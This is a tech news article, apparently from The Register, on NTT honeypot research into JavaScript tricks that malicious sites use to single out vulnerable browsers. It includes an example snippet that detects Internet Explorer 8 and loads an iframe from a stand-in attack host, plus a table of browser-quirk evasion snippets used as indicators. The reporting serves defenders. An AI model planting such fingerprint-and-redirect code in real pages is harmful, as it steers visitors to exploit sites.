How evil JavaScript helps attackers tag possible victims – and gives away their intent

Countdown to ancient IE a telltale sign of malice

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT's Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC) here. In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it's worth watching to see if malware authors are using it that way.

Takata's group identified five evasion techniques that all abuse differences between JavaScript implementations, he stated, which is more complex than familiar redirection attacks that look at the User-Agent and redirect victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

var ua = navigator.userAgent; 
     if(ua.indexOf(“MSIE 8”) > -1) { 
     var ifr = document.createElement("iframe"); 
     ifr.setAttribute("src", “http://mal.example/ua=”+ ua);

It matters, Takata said, because the evasion techniques identified in the research can serve as attack signatures.

The NTT team took two approaches to traffic collection: a "high interaction" honeyclient (a real browser designed to detect browser exploits), and a "low interaction" honeyclient that can "emulate many different client profiles, trace complicated redirections and hook code executions in detail".

Over several years, the NTT group collected and analysed 8,500 JavaScript samples from 20,000-plus malicious sites, and found five previously unseen evasion techniques as shown below.

Evasion technique Evasive code
Use of original object window.sidebar
Difference in array processing ["a","b",].length
Difference in string processing "\v"=="v"
Difference in setTimeout() processing setTimeout(10)
Difference in parseInt() processing parseInt("0123")

Takata wrote that of these setTimeout() provided the best indicator of compromise (IOC) – mainly because the other four aren't in current use.

That particular function helped attackers identify IE 8 and IE 9 browsers, because they return an "Invalid argument" error if a site asks them to process setTimeout(10); Firefox and Chrome don't.

That code turned out to be the strongest IOC of the five evasive code snippets NTT identified in its scan of more than 860,000 URLs: all of the 26 URLs that served up setTimeout(10) were in compromised websites, members of a mass "Fake jQuery" injection campaign. The other samples turned out to be either benign, or no longer in use. ®

Similar topics

Other stories you might like

  • Microsoft unveils Android apps for Windows 11 (for US users only)

    Windows Insiders get their hands on the Windows Subsystem for Android

    Microsoft has further teased the arrival of the Windows Subsystem for Android by detailing how the platform will work via a newly published document for Windows Insiders.

    The document, spotted by inveterate Microsoft prodder "WalkingCat" makes for interesting reading for developers keen to make their applications work in the Windows Subsystem for Android (WSA).

    WSA itself comprises the Android OS based on the Android Open Source Project 1.1 and, like the Windows Subsystem for Linux, runs in a virtual machine.

    Continue reading
  • Software Freedom Conservancy sues TV maker Vizio for GPL infringement

    Companies using GPL software should meet their obligations, lawsuit says

    The Software Freedom Conservancy (SFC), a non-profit which supports and defends free software, has taken legal action against Californian TV manufacturer Vizio Inc, claiming "repeated failures to fulfill even the basic requirements of the General Public License (GPL)."

    Member projects of the SFC include the Debian Copyright Aggregation Project, BusyBox, Git, GPL Compliance Project for Linux Developers, Homebrew, Mercurial, OpenWrt, phpMyAdmin, QEMU, Samba, Selenium, Wine, and many more.

    The GPL Compliance Project is described as "comprised of copyright holders in the kernel, Linux, who have contributed to Linux under its license, the GPLv2. These copyright holders have formally asked Conservancy to engage in compliance efforts for their copyrights in the Linux kernel."

    Continue reading
  • DRAM, it stacks up: SK hynix rolls out 819GB/s HBM3 tech

    Kit using the chips to appear next year at the earliest

    Korean DRAM fabber SK hynix has developed an HBM3 DRAM chip operating at 819GB/sec.

    HBM3 (High Bandwidth Memory 3) is a third generation of the HBM architecture which stacks DRAM chips one above another, connects them by vertical current-carrying holes called Through Silicon Vias (TSVs) to a base interposer board, via connecting micro-bumps, upon which is fastened a processor that accesses the data in the DRAM chip faster than it would through the traditional CPU socket interface.

    Seon-yong Cha, SK hynix's senior vice president for DRAM development, said: "Since its launch of the world's first HBM DRAM, SK hynix has succeeded in developing the industry's first HBM3 after leading the HBM2E market. We will continue our efforts to solidify our leadership in the premium memory market."

    Continue reading

Biting the hand that feeds IT © 1998–2021